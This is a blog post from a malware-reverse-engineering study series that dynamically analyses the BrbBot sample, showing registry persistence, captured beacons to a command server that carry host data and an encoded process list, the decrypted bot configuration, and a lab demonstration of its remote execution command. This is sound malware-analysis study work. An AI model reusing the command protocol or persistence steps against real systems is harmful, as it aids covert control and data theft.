Monday, January 11, 2021

Continuing Malware Analysis - Dynamic Analysis of BrbBot

This post and all others for this month are part of the series which I used to help me prepare for my GIAC Reverse Engineer Malware (GREM) certification.

In the previous post, we did static analysis of Brbbot. In this post, we look at dynamic analysis, to gain insights into the behaviour of the program. Remember, VirusTotal reported that 52/74 engines reported this file as malicious.

The tools use here will be as follows:
- TShark
- InetSim on Kali
- Process Monitor - Windows 10
- Process Hacker - Windows 10
- Process Explorer - Windows 10
- RegShot - Windows 10
- ProcDot

Let's see what the tools above provided us once we executed brbbot.exe on Windows 10 as an administrator

Looking first at the RegShot comparison summary, we see:

RegShot Comparison Summary





































Note the total changes are not all from running brbbot.exe but also from other programs which were executed intentionally or unintentionally.

Looking at the report and picking out a few entries of immediate interest.

Created with Regshot 1.9.1 x64 Unicode (beta r321)
Comments:
Datetime: 2020-11-08 20:19:04, 2020-11-08 22:15:15
Computer: SECURITYNIK-WIN, SECURITYNIK-WIN
Username: SecurityNik, SecurityNik


Values added: 
...
 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\brbbot: "C:\Users\SecurityNik\AppData\Roaming\brbbot.exe"
HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A6858C8A-6321-4416-ACF2-A4DF3C4480B4}\AppId: "C:\brbbot.exe"
 HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\brbbot.exe: 53 41 43 50 01 00 00 00 00 00 00 00 07 00 00 00 28 00 00 00 00 28 01 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 0A 73 20 00 00 DB 80 FD AC 28 39 D3 01 00 00 00 00 00 00 00 00
 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\brbbot: "C:\Users\SecurityNik\AppData\Roaming\brbbot.exe"
 HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A6858C8A-6321-4416-ACF2-A4DF3C4480B4}\AppId: "C:\brbbot.exe"
...


Taking a quick look via Process Hacker.


Looking at the general tab



Peaking into the Strings loaded into memory.


Peaking into the modules being used brbbot.exe. 



Looking at the Handles.




Transitioning to Process Monitor, we see along with the network connections, we see a file named brbconfig.tmp is being read and then closed. If you remember, in the static analysis there was a config file in the resource section. Could this be the file being read here?



Transitioning to ProcDot, where a save copy of the Process Monitor events are fed to it as input file. 


Transitioning to the network traffic as see from the perspective of Inetsim and TShark.

Looking first at the INetSim report below, we see a DNS request to brb.3dtuts.by followed by an HTTP GET request. The GET request seems to be for a file named ads.php. Additionally, the request has some parameters for which i seems to be my computer's IP address and c seeming to be my computer name. Additionally, there is a parameter p for which seems to be a long value which seems to be Hex values.

$ sudo cat /var/log/inetsim/report/report.18951.txt | more
=== Report for session '18951' ===

Real start date            : 2020-11-08 17:11:53
Simulated start date       : 2020-11-08 17:11:53
Time difference on startup : none

...
2020-11-08 17:12:52  DNS connection, type: A, class: IN, requested name: brb.3dtuts.by
2020-11-08 17:12:52  HTTP connection, method: GET, URL: http://brb.3dtuts.by/ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=123f373e6008222
82f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e
233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e6
03f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60
282d383334282f753e233e60282d383334282f753e233e600d193423083e292d32383e753e233e60163e363429227b1834362b293e282832343560282d383334282f753e2
33e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d38333428
2f753e233e60082228363435753e233e60282b372e35303f753e233e60083e382e29322f22133e3a372f33083e292d32383e753e233e60282d383334282f753e233e602e3
5283e383a2b2b753e233e603834353334282f753e233e60282b372e3530762c32353e2d2f37343c753e233e60282d383334282f753e233e60083e3a29383312353f3e233e
29753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e602f3a28303334282f2c753e233e60382f3d363435753e233e603e232
b3734293e29753e233e6008333e37371e232b3e29323e35383e1334282f753e233e60083e3a2938330e12753e233e60092e352f32363e192934303e29753e233e60092e35
2f32363e192934303e29753e233e600830222b3e193a38303c29342e353f1334282f753e233e6016081a08182e3217753e233e600d1934230f293a22753e233e6014353e1
f29322d3e753e233e60133e372b0b3a353e753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600b2934383e2828133a38303e29753e233e602b2934
383e232b6d6f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e6038363f753e233e603834353334282f753e233e600b2934383634357
53e233e600b2934383634356d6f753e233e60093e3c2833342f76236d6f760e353238343f3e753e233e60282d383334282f753e233e600c32293e28333a2930753e233e60
0822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603f37373334282f753e233e603f37373334282f753e233e6039293939342f753e233e, f
ile name: /var/lib/inetsim/http/fakefiles/sample.html

...

Let's get TShark's view of this communication. First, looking at the DNS request and response, we see the query for brb.3dtuts.by.

└─$ tshark -r brbbot.pcap -Y "dns.qry.name == brb.3dtuts.by"
   15 25.543214256   10.0.0.110 → 10.0.0.114   DNS 73 Standard query 0x6a64 A brb.3dtuts.by
   16 25.551623068   10.0.0.114 → 10.0.0.110   DNS 89 Standard query response 0x6a64 A brb.3dtuts.by A 10.0.0.114

Looking at the HTTP Traffic, we see below that I have multiple connections. Looking closely at the time, it seems the malware calls home (beacons) every 30 seconds.

└─$ tshark -r brbbot.pcap -Y "http.host == brb.3dtuts.by" -T fields -e frame.time -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.host -E header=y
           frame.time                     ip.src   tcp.srcport  ip.dst     tcp.dstport  http.host
Nov  8, 2020 17:12:52.715732789 EST     10.0.0.110      4081    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:13:22.745066520 EST     10.0.0.110      4082    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:13:52.763137491 EST     10.0.0.110      4084    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:14:22.782289408 EST     10.0.0.110      4086    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:14:52.826690345 EST     10.0.0.110      4087    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:15:22.865526674 EST     10.0.0.110      4088    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:15:52.908439391 EST     10.0.0.110      4089    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:16:22.928449020 EST     10.0.0.110      4090    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:16:52.954382147 EST     10.0.0.110      4092    10.0.0.114      80      brb.3dtuts.by

Looking into the session with source source port 4081 and destination port 80, we see:

└─$ tshark -r brbbot.pcap -q -z follow,tcp,ascii,10.0.0.110:4081,10.0.0.114:80                                                     130 ⨯

===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.110 and tcp.srcport eq 4081) and (ip.dst eq 10.0.0.114 and tcp.dstport eq 80)) or ((ip.src eq 10.0.0.114 and tcp.srcport eq 80) and (ip.dst eq 10.0.0.110 and tcp.dstport eq 4081))
Node 0: 10.0.0.110:4081
Node 1: 10.0.0.114:80
2148
GET /ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e603f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e600d193423083e292d32383e753e233e60163e363429227b1834362b293e282832343560282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e60082228363435753e233e60282b372e35303f753e233e60083e382e29322f22133e3a372f33083e292d32383e753e233e60282d383334282f753e233e602e35283e383a2b2b753e233e603834353334282f753e233e60282b372e3530762c32353e2d2f37343c753e233e60282d383334282f753e233e60083e3a29383312353f3e233e29753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e602f3a28303334282f2c753e233e60382f3d363435753e233e603e232b3734293e29753e233e6008333e37371e232b3e29323e35383e1334282f753e233e60083e3a2938330e12753e233e60092e352f32363e192934303e29753e233e60092e352f32363e192934303e29753e233e600830222b3e193a38303c29342e353f1334282f753e233e6016081a08182e3217753e233e600d1934230f293a22753e233e6014353e1f29322d3e753e233e60133e372b0b3a353e753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600b2934383e2828133a38303e29753e233e602b2934383e232b6d6f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e6038363f753e233e603834353334282f753e233e600b293438363435753e233e600b2934383634356d6f753e233e60093e3c2833342f76236d6f760e353238343f3e753e233e60282d383334282f753e233e600c32293e28333a2930753e233e600822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603f37373334282f753e233e603f37373334282f753e233e6039293939342f753e233e HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: brb.3dtuts.by
Connection: Close
Cache-Control: no-cache


        150
HTTP/1.1 200 OK
Connection: Close
Content-Type: text/html
Date: Sun, 08 Nov 2020 22:12:52 GMT
Content-Length: 258
Server: INetSim HTTP Server


        258
<html>
  <head>
    <title>INetSim default HTML page</title>
  </head>
  <body>
    <p></p>
    <p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p>
    <p align="center">This file is an HTML document.</p>
  </body>
</html>


Above we see the default INetSim page returned. However, the request was made for ads.php. Maybe we can manipulate this request by adding a file called ads.php. I instead switched to Apache and created a file named ads.php into the apache director and then let brbbot.exe grab that file. That seems to work. Let's see what that looks like. Here is the file.

└─$ sudo cat /var/www/html/ads.php
<HTML>
        <TITLE>SecurityNik ads.php</TITLE>
        <BODY>
                Welcome to SecurityNik World!
        </BODY>

</HTML>

When the bot makes the request, we see Apache returned ads.php via the 200 successful message.

10.0.0.110 - - [08/Nov/2020:22:24:05 -0500] "GET /ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e603f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e600d193423083e292d32383e753e233e60163e363429227b1834362b293e282832343560282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e60082228363435753e233e60282b372e35303f753e233e60083e382e29322f22133e3a372f33083e292d32383e753e233e60282d383334282f753e233e602e35283e383a2b2b753e233e603834353334282f753e233e60282b372e3530762c32353e2d2f37343c753e233e60282d383334282f753e233e60083e3a29383312353f3e233e29753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e602f3a28303334282f2c753e233e60382f3d363435753e233e603e232b3734293e29753e233e6008333e37371e232b3e29323e35383e1334282f753e233e60083e3a2938330e12753e233e60092e352f32363e192934303e29753e233e60092e352f32363e192934303e29753e233e600830222b3e193a38303c29342e353f1334282f753e233e6016081a08182e3217753e233e600d1934230f293a22753e233e6014353e1f29322d3e753e233e60133e372b0b3a353e753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e602b2934383e232b6d6f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e6038363f753e233e603834353334282f753e233e600b293438363435753e233e600b2934383634356d6f753e233e60282d383334282f753e233e600c32293e28333a2930753e233e600822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603d32293e3d3423753e233e60282d383334282f753e233e603a2e3f32343f3c753e233e6039293939342f753e233e HTTP/1.1" 200 292 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"

Stepping back for a second, we saw the system create a file brbconfig.tmp. Looking into the file, we see:


The above does not seem helpful in anyway. Taking a look via Hexdump



Looks like we will need to decrypt or decode this file. If we remember, during the static analysis phase, we saw cryptographic functions such as:



Setting a Breakpoint on the CreateFileA function, we see the first argument is in the RCX register. If I understood the x64 calling conventions clearly, it leverages the register RCX, RDX, R8 and R9 for parameters before using the Stack.. In this case the first parameter of the CreateFileA is the lpFileName. If I am wrong on this, please correct me if you are reading this.



Now that we know the file is created, let's jump to where it is read, by setting another breakpoint, this time on the ReadFile call. Looking at Microsoft documentation, it says the first argument to the ReadFile call is a handle to the device. Looking below, we see the handle is 0x108 which can be found in the RCX register.


Confirming that this is the handle to the brbconfig.tmp file, we now take a look at the handles from a different perspective. This time we go back to SysInternals Handle64.exe.

C:\Tools\SysinternalsSuite>handle64.exe -p brbbot.exe                    
Nthandle v4.11 - Handle viewer  
Copyright (C) 1997-2017 Mark Russinovich 
Sysinternals - www.sysinternals.com 
------------------------------------------------------------------------------ 
brbbot.exe pid: 4164 SECURITYNIK-WIN\SecurityNik
108: File  (R--)   C:\GREM-Malware\Malware\day1\brbconfig.tmp

Above we see 0x108 handle points to the brbconfig.tmp file. 

Scrolling through until I fond the CryptDecrypt function, I then set a breakpoint at the instruction directly after. This then allowed me to see the decrypted content of the brbconfig.tmp file as shown below.


The decrypted communication looks like

"uri=ads.php;exec=cexe;file=elif;conf=fnoc;exit=tixe;encode=5b;sleep=30000"

Above we see the ads.php file is requested with what seems to be commands to execute and an encode value of 5b.

Let's add a value to exec for notepad.exe to our ads.php file to see what we get

─$ sudo bash -c 'echo -e cexe notepad.exe > /var/www/html/ads.php'
     
─$ sudo cat /var/www/html/ads.php                                 
cexe notepad.exe

Running brbbot.exe again, we see that that notepad is being executed around every 30 seconds.

PS C:\Users\SecurityNik> Get-Process *notepad* | Select-Object -Property Name,Id,StartTime,ProcessName | Sort-Object -Property StartTime

Name      Id StartTime             ProcessName
----      -- ---------             -----------
notepad 5444 11/9/2020 11:38:58 PM notepad
notepad 3528 11/9/2020 11:39:29 PM notepad
notepad 3856 11/9/2020 11:39:59 PM notepad
notepad 7740 11/9/2020 11:40:29 PM notepad
notepad 5376 11/9/2020 11:40:59 PM notepad
notepad 6984 11/9/2020 11:41:29 PM notepad
notepad 7252 11/9/2020 11:41:59 PM notepad
notepad 7748 11/9/2020 11:42:29 PM notepad
notepad 7176 11/9/2020 11:42:59 PM notepad
notepad 2964 11/9/2020 11:43:29 PM notepad
notepad 3640 11/9/2020 11:43:59 PM notepad
notepad 2280 11/9/2020 11:44:29 PM notepad
notepad 5448 11/9/2020 11:44:59 PM notepad
notepad 8184 11/9/2020 11:45:29 PM notepad
notepad 2112 11/9/2020 11:45:59 PM notepad
notepad 2428 11/9/2020 11:46:29 PM notepad
notepad 3368 11/9/2020 11:46:59 PM notepad
notepad 5036 11/9/2020 11:47:29 PM notepad
notepad 3632 11/9/2020 11:47:59 PM notepad
notepad 2608 11/9/2020 11:48:29 PM notepad
notepad 6372 11/9/2020 11:48:59 PM notepad
notepad 7524 11/9/2020 11:49:29 PM notepad
notepad 6780 11/9/2020 11:49:59 PM notepad
notepad  248 11/9/2020 11:50:29 PM notepad
notepad 7616 11/9/2020 11:50:59 PM notepad
notepad  192 11/9/2020 11:51:29 PM notepad


Taking a view via WMIC, we see:

PS C:\Users\SecurityNik> wmic process where "name like '%notepad%'" get name,processID,ParentProcessID
Name         ParentProcessId  ProcessId
notepad.exe  1596             5444
notepad.exe  1596             3528
notepad.exe  1596             3856
notepad.exe  1596             7740
notepad.exe  1596             5376
notepad.exe  1596             6984
notepad.exe  1596             7252
notepad.exe  1596             7748
notepad.exe  1596             7176
notepad.exe  1596             2964
notepad.exe  1596             3640
notepad.exe  1596             2280
notepad.exe  1596             5448
notepad.exe  1596             8184
notepad.exe  1596             2112
notepad.exe  1596             2428
notepad.exe  1596             3368
notepad.exe  1596             5036
notepad.exe  1596             3632
notepad.exe  1596             2608
notepad.exe  1596             6372
notepad.exe  1596             7524
notepad.exe  1596             6780
notepad.exe  1596             248
notepad.exe  1596             7616
notepad.exe  1596             192
notepad.exe  1596             672

Looking at the parent for those Notepad.exe processes, we see brbbot.exe is the parent with PID 1596.

PS C:\Users\SecurityNik> wmic process where processid="1596" get name,processID,parentProcessID
Name        ParentProcessId  ProcessId
brbbot.exe  4476             1596
 

Final step now is to decode the traffic from the HTTP request within the p parameter above. We saw in the ads.php file a value of encode=5b. This 5b is used to Hex encode the values within the p parameter. I copied the values in the p parameter to a file named p-parameter.txt with everything on one line. Here is what that looks like.

└─$ cat p-parameter.txt 
123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e603f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e600d193423083e292d32383e753e233e60163e363429227b1834362b293e282832343560282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e60082228363435753e233e60282b372e35303f753e233e60083e382e29322f22133e3a372f33083e292d32383e753e233e60282d383334282f753e233e602e35283e383a2b2b753e233e603834353334282f753e233e60282b372e3530762c32353e2d2f37343c753e233e60282d383334282f753e233e60083e3a29383312353f3e233e29753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e602f3a28303334282f2c753e233e60382f3d363435753e233e603e232b3734293e29753e233e6008333e37371e232b3e29323e35383e1334282f753e233e60083e3a2938330e12753e233e60092e352f32363e192934303e29753e233e60092e352f32363e192934303e29753e233e600830222b3e193a38303c29342e353f1334282f753e233e6016081a08182e3217753e233e600d1934230f293a22753e233e6014353e1f29322d3e753e233e60133e372b0b3a353e753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600b2934383e2828133a38303e29753e233e602b2934383e232b6d6f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e6038363f753e233e603834353334282f753e233e600b293438363435753e233e600b2934383634356d6f753e233e60093e3c2833342f76236d6f760e353238343f3e753e233e60282d383334282f753e233e600c32293e28333a2930753e233e600822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603f37373334282f753e233e603f37373334282f753e233e6039293939342f753e233e

xxd is used next to revert the hex values above to raw binary as show below:

└─$ xxd -revert -plain p-parameter.txt > p-parameter.raw

The file p-parameter.raw looks like.

└─$ cat p-parameter.raw           
?7>"(/>6`(6((u>#>`8()((u>#>`,25252/u>#>`8()((u>#>`,2574<45u>#>`(>)-28>(u>#>`7(:((u>#>`(-834(/u>#>`=45/?)-34(/u>#>`=45/?4>)-28>u>#>`>64)"{▒46+)>((245`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(+447(-u>#>`(-834(/u>#>"(645u>#>`(+7.50?u>#>>8.)2/">:7/>)-28>u>#>`(-834(/u>#>`.5(>8:++u>#>`84534(/u>#>`(+7.50v,25>-/74<u>#>`(-834(/u>#>>:)835?>#>)u>#>`(-834(/u>#>`(234(/u>#>`(-834(/u>#>`/:(034(/,u>#>`8/=645u>#>`>#+74)>)u>#>3>77#+>)2>58>4(/u>#>>:)83u>#>`       .5/26>)4#):"u>#>`5>)2->u>#>`>7+0>)u>#>0"+>:80<)4.5?4(/u>#>▒.2u>#>`
                        :5>u>#>`▒++728:/245):6>4(/u>#>`
                                                       )48>((:80>)u>#>`+)48>#+mou>#>`   .5/26>)40>)u>#>`?7734(/u>#>`86?u>#>`84534(/u>#>`
                 )48645u>#>`
                            )48645mou>#>`       ><(34/v#mov5284?>u>#>`(-834(/u>#>`
                                                                                  2)>(3:)0u>#>"(/>>//25<(u>#>`/:(034(/,u>#>`?7734(/u>#>`?7734(/u>#>`9)994/u>#> 

To decode the p-parameter.raw file, I passed it as input to CyberChef.
 


After decoding, we see that along with the IP address and computer name, brbbot.exe also was exfiltrating information on the processes currently running on the host.

That's all for this post as I believe I achieved the learnings I was required for this malware.

P.S. Not sure if you noticed it. However, I had to run brbbot.exe a few times and thus you might have noticed the PID changed, etc. The concepts still remain the same though.




No comments:

Post a Comment